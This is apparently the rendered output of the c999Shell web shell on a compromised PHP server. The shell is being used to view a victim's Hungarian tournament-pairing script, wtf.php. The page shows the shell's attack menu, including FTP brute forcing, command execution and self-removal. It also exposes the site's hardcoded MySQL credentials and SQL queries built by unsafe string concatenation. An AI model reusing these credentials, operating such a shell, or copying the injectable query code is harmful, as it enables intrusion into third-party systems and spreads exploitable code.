!c999Shell v. 1.0 pre-release build #16!

Software: nginx. PHP/5.2.17 

uname -a: Linux hosting 2.6 #1 i686 

 

Safe-mode: OFF (not secure)

/   drwxr-xr-x
Free of (0%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     wtf.php (2.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$kapcsolat mysql_connect("127.0.0.1""fanshop""fanshop");
if (!$kapcsolat) die("Nem sikerült kapcsolódni az adatbázishoz!");
mysql_select_db("fanshop"$kapcsolat) or die("Nem sikerült kiválasztani az adatbázist!");

$result mysql_query2("SELECT * FROM lan_team WHERE game = 'cs'");
$row_nr round(mysql_num_rows($result) / 2);
$result3 mysql_query2("SELECT id FROM lan_team WHERE game = 'cs' ORDER BY RAND() LIMIT ".$row_nr);
$rand_teams = array();
$selected_teams = array();
$newgroups = array();
while ($row3 mysql_fetch_array($result3)) {
array_push($rand_teams$row3['id']);
}
for ($for_var=0$for_var<=$row_nr-1$for_var++) {
$team_rand_result mysql_query2("SELECT * FROM lan_team WHERE id = '".$rand_teams[$for_var]."'");
$team_rand mysql_fetch_assoc($team_rand_result);
$played explode(';'$team_rand['group_played']);
$query_st  "SELECT * FROM lan_team WHERE ";

foreach ($rand_teams as $key1 => $value1) {
$query_st .= "id != '".$value1."' AND ";
}

if (count($played) != 0) {
foreach ($played as $key2 => $value2) {
$query_st .= "id != '".$value2."' AND ";
}
}

if (count($selected_teams) != 0) {
foreach ($selected_teams as $key3 => $value3) {
$query_st .= "id != '".$value3."' AND ";
}
}

$query_st .= "game = 'cs' ORDER BY RAND()";
$result2 mysql_query2($query_st);
$row2_nr mysql_num_rows($result2);
if ($row2_nr == 0) {
$row2['name'] = 'Pihen';
} else {
$row2 mysql_fetch_assoc($result2);
array_push($selected_teams$row2['id']);
unset($domod1); unset($domod2);
$domod1 = array($rand_teams[$for_var] => $team_rand['group_played'].';'.$row2['id']);
$domod2 = array($selected_teams[$for_var] => $row2['group_played'].';'.$team_rand['id']);
array_push($newgroups$domod1);
array_push($newgroups$domod2);
}
echo $team_rand['name'].' - '.$row2['name']; echo '<br />';
}
echo '<br />';
unset($key4); unset($value4); unset($key5); unset($value5);
foreach ($newgroups as $key4 => $value4) {
foreach ($value4 as $key5 => $value5) {
mysql_query2("UPDATE `lan_team` SET `group_played` = '".$value5."' WHERE `id` = '".$key5."'");
echo $key5.' - '.$value5; echo '<br />';
}
}
mysql_close($kapcsolat);

function mysql_query2($a){
$x=mysql_query($a);

print("<h2>QUERY:</h2> ".$a."<h2> ERTEKE: </h2>");
print_r(mysql_fetch_array($x));
print($x."<br>");
return $x;
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::